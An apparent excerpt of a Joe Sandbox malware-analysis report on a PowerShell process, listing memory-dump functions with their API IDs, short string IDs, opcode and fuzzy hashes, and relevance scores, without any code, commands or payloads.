                                                • Source File: 0000000F.00000002.746656539.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_210000_powershell.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 5999fe9fa298bd03c51cfdf7f975b97b8b8b90a431290fbde79631eb3cd53497
                                                • Instruction ID: 2eede9f78c12b3cb696388707e11261b6b7629fc5d6e62cc7c7d4ed0b360e64d
                                                • Opcode Fuzzy Hash: 5999fe9fa298bd03c51cfdf7f975b97b8b8b90a431290fbde79631eb3cd53497
                                                • Instruction Fuzzy Hash: A9115BB5D003098BCB20DFAAD8487EEFFF5EF88324F24881AD459A7240C7759944CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0021C058 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746656539.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_210000_powershell.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 05342d681bb2b6c5510d8ffd00465dbc37091790cf0cfece1c2220ab805c1c1c
                                                • Instruction ID: f486a75c749fcc6a15b28cbb8f8b4d1b6ec2f30b34f0e9cb87c7b4cef08a9ad3
                                                • Opcode Fuzzy Hash: 05342d681bb2b6c5510d8ffd00465dbc37091790cf0cfece1c2220ab805c1c1c
                                                • Instruction Fuzzy Hash: 9F1128B5D003098BCB20DFAAD8447EEFFF5EF88324F24881AD455A7640C775A944CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04A4000F Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.779886012.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_4a40000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h%h
                                                • API String ID: 0-240672060
                                                • Opcode ID: 0edbd90d2399738559fd1aef15faf280cedc5c17dd4b76bf38f26518c8e80e37
                                                • Instruction ID: 03eecfe2bfb999769d718047123692bc1595d05d5ae51a2e457b2afd8593d605
                                                • Opcode Fuzzy Hash: 0edbd90d2399738559fd1aef15faf280cedc5c17dd4b76bf38f26518c8e80e37
                                                • Instruction Fuzzy Hash: BB916B74A09204DFDB50CF68C581AAEBBF2EFC9314F1984A9D904AF256C735EC42DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00383294 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPp
                                                • API String ID: 0-1477601333
                                                • Opcode ID: 32523d2cd14c883d9682e7c45bb3da0a5e9237fc501684aa6e1d66d442b10032
                                                • Instruction ID: ebf704a9be4a0ab73a844eb36204abf0ab8f36091cdc7dee9ca3558ea9fcacc6
                                                • Opcode Fuzzy Hash: 32523d2cd14c883d9682e7c45bb3da0a5e9237fc501684aa6e1d66d442b10032
                                                • Instruction Fuzzy Hash: F351E5346053449FCB16AF29C851A6EBFB2AF84700F1D80E9E8859F392CBB1DE41C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038FC5C Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p
                                                • API String ID: 0-481844870
                                                • Opcode ID: 39e3ef0eede8b6ef86b4471fb2b1c02b00e08b83de33b7d4707b0e530e25f745
                                                • Instruction ID: f91e50e033c0c001077ee93523313b2a0073904e4d49a296045b6ab90e8789b8
                                                • Opcode Fuzzy Hash: 39e3ef0eede8b6ef86b4471fb2b1c02b00e08b83de33b7d4707b0e530e25f745
                                                • Instruction Fuzzy Hash: C7210A70B0030ADFCB657A35950077E7AF5AF48350F2540B5DA05DB64ADB39CC9687A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00385508 Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74a597c8cd21b53c6d32c310b452a5a3de1dac93818e4014e1e3fc068ed97ecc
                                                • Instruction ID: 342a415fe16e04aba8d4b8d18a494f983519a8822650e22fec2834c66a4698a4
                                                • Opcode Fuzzy Hash: 74a597c8cd21b53c6d32c310b452a5a3de1dac93818e4014e1e3fc068ed97ecc
                                                • Instruction Fuzzy Hash: F031AD74B00204AFDB15AB78D851FAF7BB3ABC8304F258424E801AF785CE75DC828B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00388B2A Relevance: .1, Instructions: 74COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 249fcc8879cecde1d0c3ede1247b5bb2b35abe0ebf3049096af40904934d1fa7
                                                • Instruction ID: c89efd022b163be2f21bd568ecaa61cdefda593985abef41b0214b5412213921
                                                • Opcode Fuzzy Hash: 249fcc8879cecde1d0c3ede1247b5bb2b35abe0ebf3049096af40904934d1fa7
                                                • Instruction Fuzzy Hash: 9421A1B0A01305DFCB26EF28C540A69B7B6AFC8310BA981E5D818DB209DB31DD80DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 003855E5 Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dad15ecd9d71c3fec37e0471e870d9133ef72fea330574c880989a55e42be1d1
                                                • Instruction ID: 195c46288b945f22465f8ac82a053776284e5b66ea063620052525516692c059
                                                • Opcode Fuzzy Hash: dad15ecd9d71c3fec37e0471e870d9133ef72fea330574c880989a55e42be1d1
                                                • Instruction Fuzzy Hash: BF217C74B10304EFCB15AF78D445FAABBB2AB88314F658465E811AF391CB39DC42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00388AED Relevance: .1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ef2b223f9db0c8fb289b083ea94dda6f8573ba6309cf78ec7a3fea332029459
                                                • Instruction ID: 98edbc27f84c8fed6cfe6b0750c7798cd8eddf6f398b79eeab0d660cb8919f7e
                                                • Opcode Fuzzy Hash: 8ef2b223f9db0c8fb289b083ea94dda6f8573ba6309cf78ec7a3fea332029459
                                                • Instruction Fuzzy Hash: 1F2104B5701300CF8B26BB6894409A9F7B2AFC8320BA985E6C4158F25ACF32CC41D761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00381690 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd19d4ca7f74f62b510ff70dbc684aeb2072ba76a4342c830305cfc95e5a096e
                                                • Instruction ID: bec319988df221ef74989c475a2b36d362c028f4193676b510e3c35af6b138f7
                                                • Opcode Fuzzy Hash: bd19d4ca7f74f62b510ff70dbc684aeb2072ba76a4342c830305cfc95e5a096e
                                                • Instruction Fuzzy Hash: D201D4363043105BDB2169AA940066AB7DDAFD1361F28847AD9C5C6240EA76DD56C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0015D01D Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746537543.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_15d000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39c836c8a36160b6de7635a8bde5a150e62039a3ccf721258040c861a70344b1
                                                • Instruction ID: 134820c6a51d0dda315540774933cd48576d8112b2540f94a5b7d595b177da3f
                                                • Opcode Fuzzy Hash: 39c836c8a36160b6de7635a8bde5a150e62039a3ccf721258040c861a70344b1
                                                • Instruction Fuzzy Hash: 52018471504340EAE7205E19D884B66BF98DF41725F28841AFC554E2C6C7799849CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0015D006 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746537543.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_15d000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 224bacb9506675f3ec03adbdd7cfe85a640d66a51feb877cccf139b4d102aade
                                                • Instruction ID: 446f29c55bf050685a4de39c76b4501f2f9bd3db911ce7b7af482d6cdf8f867c
                                                • Opcode Fuzzy Hash: 224bacb9506675f3ec03adbdd7cfe85a640d66a51feb877cccf139b4d102aade
                                                • Instruction Fuzzy Hash: 7401526140D3C09FD7124B259C94B62BFB4DF53229F1980DBE8948F2D7C2699C48C772
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00381B27 Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51d611921106eddc748278a2c20089bf58a48d07e0240e79e4d46a660ec33aee
                                                • Instruction ID: 005738ba4dee9f7618be86589dbf744ff2b630e40adb3bbbb8467ba801644db4
                                                • Opcode Fuzzy Hash: 51d611921106eddc748278a2c20089bf58a48d07e0240e79e4d46a660ec33aee
                                                • Instruction Fuzzy Hash: ECB012301055404FC201CB10C890440BB21DF83125318C1CA9C058F253CB27ED07D751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 083F2781 Relevance: 1.3, Strings: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.783334592.00000000083F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_83f1000_powershell.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: D
                                                • API String ID: 0-2746444292
                                                • Opcode ID: 01b9cdde00f3e0b4c8e66137df76acc3c68909a0c643a0875796928ab29eea84
                                                • Instruction ID: 35d478e951f4a7677930e1d610b92751e41f41cceefa454c70ade6f07e4eb9f4
                                                • Opcode Fuzzy Hash: 01b9cdde00f3e0b4c8e66137df76acc3c68909a0c643a0875796928ab29eea84
                                                • Instruction Fuzzy Hash: F8A00179652984CFE716CB48C594B40B3A5B744A40FC95490E64987A61C36CED80CA08
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 083F278E Relevance: .1, Instructions: 113COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.783334592.00000000083F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_83f1000_powershell.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 765e9722652d8c21ff4e6edc91f542b265a506f9dfc6133c0364bc6dd73e3213
                                                • Instruction ID: e8b505519477d524e590653e6235b729a8f59e7621ab92edebf909369457001a
                                                • Opcode Fuzzy Hash: 765e9722652d8c21ff4e6edc91f542b265a506f9dfc6133c0364bc6dd73e3213
                                                • Instruction Fuzzy Hash: 73312674740741DFEB258A24C9E07DA33A2EB98B91F54813DCE4A4BB86D32D88C5CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 083F24EE Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.783334592.00000000083F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_83f1000_powershell.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 397d39b856b2331e24fa99ec0a17742be573ba503f0245412b8458cadebdde01
                                                • Instruction ID: de21ba509d5a7bd3ffa0a9b180c40f860c572f612353ad8ab5aa9b3df674bc48
                                                • Opcode Fuzzy Hash: 397d39b856b2331e24fa99ec0a17742be573ba503f0245412b8458cadebdde01
                                                • Instruction Fuzzy Hash: 02316D776043028BD7159E3DCAA435677A3EFDA261B69827ECC454B386E3399482C241
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 083F2892 Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.783334592.00000000083F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_83f1000_powershell.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf8019c54d7eecd7ecb72825b252ac4263e27fb55d9b2d2846c2e5672dd85cbf
                                                • Instruction ID: 59f2c23c876c8490820133a84f7510967563ccd41cc3961dfd50e713398f9ec3
                                                • Opcode Fuzzy Hash: cf8019c54d7eecd7ecb72825b252ac4263e27fb55d9b2d2846c2e5672dd85cbf
                                                • Instruction Fuzzy Hash: 011126B1740780DFEB18CF24C8E1B963366EB69F50F84413CC94647B86D3298C84CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 083F2522 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.783334592.00000000083F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_83f1000_powershell.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37fa767e436ac17b2fb5877c6f0116467207dc80d1b8fa6acf8e22e5559358c6
                                                • Instruction ID: e98b177b302f519d46130e0080a46770fe10df3f51e209da31971aefece4b370
                                                • Opcode Fuzzy Hash: 37fa767e436ac17b2fb5877c6f0116467207dc80d1b8fa6acf8e22e5559358c6
                                                • Instruction Fuzzy Hash: 07014775600701D7C7299A2CC4A4B76B3A3FBD8302B6D802EE80A47796D279A4C2C580
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00387478 Relevance: 23.0, Strings: 18, Instructions: 460COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: )$4'p$4'p$4'p$4'p$8R!$h%h$h%h$h%h$h%h$tPp$tPp$$p$$p$$p$$p$[h$[h
                                                • API String ID: 0-4076553537
                                                • Opcode ID: 09e6153fe33627c88ac004c7b8f254c32c735853aafd63c80d35877bfaa865c0
                                                • Instruction ID: bf51b9416ff7ea846c91e709afa110a042ce0b0324bec2ed591d9c7b36facfff
                                                • Opcode Fuzzy Hash: 09e6153fe33627c88ac004c7b8f254c32c735853aafd63c80d35877bfaa865c0
                                                • Instruction Fuzzy Hash: 3FE12631B0C3409FCB26AB69885476ABFA7AFC5310F3984EAD554CB295DB31CC41C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00387A88 Relevance: 15.3, Strings: 12, Instructions: 319COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$`\h$`\h$h%h$h%h$tPp$tPp$$p$$p$$p$$p
                                                • API String ID: 0-3061663376
                                                • Opcode ID: 74f04396c8799ca8ed844a0d30dcc1fafeff9223812217b2851cec6f1570b8dd
                                                • Instruction ID: 67ae6c7f8085241d36a156b13f10fabeec257bd9ce5627ed1d24185dfcd42458
                                                • Opcode Fuzzy Hash: 74f04396c8799ca8ed844a0d30dcc1fafeff9223812217b2851cec6f1570b8dd
                                                • Instruction Fuzzy Hash: ADA103327083409FCB1AAA688850B7ABBF7AFC5310F7984EAD545CB292DA71DC45C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 003800A0 Relevance: 11.7, Strings: 9, Instructions: 404COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L4p$L4p$L4p$L4p$L4p$L4p$`8)$`8)$`8)
                                                • API String ID: 0-2216110676
                                                • Opcode ID: 0b4bdd6fe6899b0791fcf39f99a7faa7b6637822dcdb303eb43271b85a991c00
                                                • Instruction ID: 73186d839587ec67ca9276d8c489fb401d12c3b0c7a9484ddab430e3c7f6d7d3
                                                • Opcode Fuzzy Hash: 0b4bdd6fe6899b0791fcf39f99a7faa7b6637822dcdb303eb43271b85a991c00
                                                • Instruction Fuzzy Hash: 18D15835700304EFCF5AAE68C854B6E7BF6AF85310F1984B6E9158B291CBB1CD49CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00380928 Relevance: 10.1, Strings: 8, Instructions: 146COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$89)$89)$\9)$$p$$p$$p
                                                • API String ID: 0-4085526858
                                                • Opcode ID: 639deb7bdd374a21ec3c61fc0907ecb2aa16c04dc730f325a50e5cb544145905
                                                • Instruction ID: 2ed7a52ef0b55499dd77cf6f16a014a0a41c08f5b20d61d284664b5262f9789d
                                                • Opcode Fuzzy Hash: 639deb7bdd374a21ec3c61fc0907ecb2aa16c04dc730f325a50e5cb544145905
                                                • Instruction Fuzzy Hash: 6C4116357043449FDB5EAB3888106BE7FB29F85310F2940AAC995CB292DB35CD4AC792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038E2CB Relevance: 9.0, Strings: 7, Instructions: 202COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$tPp$tPp$$p$(p$(p$(p
                                                • API String ID: 0-3814600869
                                                • Opcode ID: eae57e6fa475bf076e3672f5c2003623ff0f04793886859a713859bcbaf7ad11
                                                • Instruction ID: 27a10d814d9141fd84f4e7fd58152812bb7dd668cd6b3ad1186fc50fc41b883e
                                                • Opcode Fuzzy Hash: eae57e6fa475bf076e3672f5c2003623ff0f04793886859a713859bcbaf7ad11
                                                • Instruction Fuzzy Hash: 67710935A00300DFDB26EF15C54176EB7E6AF85310F2A80D9E8499B391DBB1DD80CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038E28C Relevance: 8.9, Strings: 7, Instructions: 183COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$tPp$tPp$$p$(p$(p$(p
                                                • API String ID: 0-3814600869
                                                • Opcode ID: 20204ae1cbf7ae40cb95a461b2f65278baa2a4f2d128a7f459eb401358db8f32
                                                • Instruction ID: a5706304c627fbd72de209e792d4e33122c3b319b988386492c61453b89c099e
                                                • Opcode Fuzzy Hash: 20204ae1cbf7ae40cb95a461b2f65278baa2a4f2d128a7f459eb401358db8f32
                                                • Instruction Fuzzy Hash: 5161D434B00300DFDB26EE55C541B6EB7E6AF85711F2A80D9E8099B391DBB1DD80DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038FE61 Relevance: 8.8, Strings: 7, Instructions: 88COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPp$tPp$$p$$p$$p$$p$$p
                                                • API String ID: 0-736929761
                                                • Opcode ID: 8ffdf782968ebc7371793156264454851d7160c5be06a0dc613fd1669739ea7c
                                                • Instruction ID: 37ae73600b90ee624ad89b25018a72c42a9b288fd878129d466a41b328cfa9f9
                                                • Opcode Fuzzy Hash: 8ffdf782968ebc7371793156264454851d7160c5be06a0dc613fd1669739ea7c
                                                • Instruction Fuzzy Hash: 7B21E4327003118FDB26AF68D540679BBE5AFD5310B6940FAEA40DB366DB71ED40C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038D1C0 Relevance: 7.7, Strings: 6, Instructions: 209COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$$p$$p$$p$$p
                                                • API String ID: 0-3219492093
                                                • Opcode ID: a6ccae094832a4b10c87b28562a0570c5cbada39d3894005166a45df4d73ce3a
                                                • Instruction ID: ff924b1bb9e20eb6de66f78bd609047123567f1586ef7f51d31475da326e640c
                                                • Opcode Fuzzy Hash: a6ccae094832a4b10c87b28562a0570c5cbada39d3894005166a45df4d73ce3a
                                                • Instruction Fuzzy Hash: C1612735B04304DFCB2AAE68D40076ABBB6AFC1310F29C8AAD855CB2D5DB75DD41C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00382406 Relevance: 6.7, Strings: 5, Instructions: 422COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8#h$h%h$h%h$h%h$[h
                                                • API String ID: 0-3945192550
                                                • Opcode ID: 5aecea01ac94177a49aa83dfa53f9732b2b24d1983341022456671c641e5a18f
                                                • Instruction ID: fd599df4e80bc6611b0cad6a1d280e8401d007f7c168222df4e00de82c3473cd
                                                • Opcode Fuzzy Hash: 5aecea01ac94177a49aa83dfa53f9732b2b24d1983341022456671c641e5a18f
                                                • Instruction Fuzzy Hash: C7023874B00304DFDB55EB58D540E6ABBB2EF88314F25C0AAE905AB355C772EC82CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038DDE5 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$$p$$p$$p
                                                • API String ID: 0-2334450948
                                                • Opcode ID: 39475b6047933fcd5ef8e023cd70bca061cdca2b3f14fd49961870a9c7f9c4ec
                                                • Instruction ID: 1ec35765ef3ab4da5491d594513d6344ec79d8ad0b8297229b8dcddd3ffc52df
                                                • Opcode Fuzzy Hash: 39475b6047933fcd5ef8e023cd70bca061cdca2b3f14fd49961870a9c7f9c4ec
                                                • Instruction Fuzzy Hash: BF312232B043018FCB2B6A68944067AFBE5ABE5310B3980FAD5428B6C5CF71DD41D392
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00380908 Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$89)$89)$$p$$p
                                                • API String ID: 0-964115858
                                                • Opcode ID: 75f38f976c32b00043686062c6f8925a50b1b82a1ed522af42fe73ea4c5635c5
                                                • Instruction ID: 0f4ff11ff7745a9097beaf9edeeb5aa2dd8a3c1a3e658a16f88131c8584d7ba9
                                                • Opcode Fuzzy Hash: 75f38f976c32b00043686062c6f8925a50b1b82a1ed522af42fe73ea4c5635c5
                                                • Instruction Fuzzy Hash: 3331D530A09345DFDB5EAA30C41077E7BB5AF85310F1A40E6C8509B192D779CD89C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038D478 Relevance: 5.5, Strings: 4, Instructions: 479COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (op$(op$(op$(op
                                                • API String ID: 0-4040569024
                                                • Opcode ID: 9724c8849f98d5891be29312aa52bd367dcc1c61f87209192fd2293006a6461a
                                                • Instruction ID: 3dd28c0f04088bd04a2afc8bef985571d5ef25f43b1ef344730dd767a249e525
                                                • Opcode Fuzzy Hash: 9724c8849f98d5891be29312aa52bd367dcc1c61f87209192fd2293006a6461a
                                                • Instruction Fuzzy Hash: A3F12431B04304DFDB16AF28D854BAABBB6AF85310F2984AAE415CB2D1DB71DC41CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00389134 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                Download Yara Rule
                                                Strings
